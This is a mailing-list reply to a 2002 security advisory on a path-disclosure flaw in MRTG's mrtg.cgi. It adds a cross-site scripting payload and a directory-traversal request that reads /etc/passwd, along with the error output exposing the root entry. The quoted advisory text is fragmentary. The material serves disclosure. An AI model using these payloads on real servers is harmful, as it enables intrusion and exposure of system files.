Re: Mrtg Path Disclosure Vulnerability

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/mrtg.cgi?log=<script>alert('Cross Site Scripting')</script>

/mrtg.cgi?cfg=../../etc/passwd :

------------------- mrtg.cgi error ------------------------

Software error:
ERROR: CFG Error Unknown Option "root:PASS:0:0:root:/root" on line 2 or 
above. Check doc/reference.txt for Help

------------------- mrtg.cgi error ------------------------

>Hash: SHA1
>Mrtg Path Disclosure Vulnerability
>Input Validation Error
>Release Date:
>February 4, 2002
>Product / Vendor:
>The Multi Router Traffic Grapher (Mrtg) is a tool to monitor the
>traffic load on network-links. Mrtg generates html pages containing
>gif images which provide a live visual representation of this
>If an attacker submits a web request containing unexpected arguments
>for script variables, an error message will be displayed containing
>the path to the webroot directory of the server running the Mrtg cgi
>Mrtg v2.090011
>Mrtg v2.090006
>Mrtg v2.090011
>Mrtg v2.090006
>And may be other.
> is not responsible for the misuse or
>illegal use of any of the information and/or the software listed on
>this security advisory.
>Tamer Sahin
>Tamer Sahin
>PGP Key ID: 0x2B5EDCB0 Fingerprint:
>B96A 5DFC E0D9 D615 8D28 7A1B BB8B A453 2B5E DCB0
>Version: PGP 7.1

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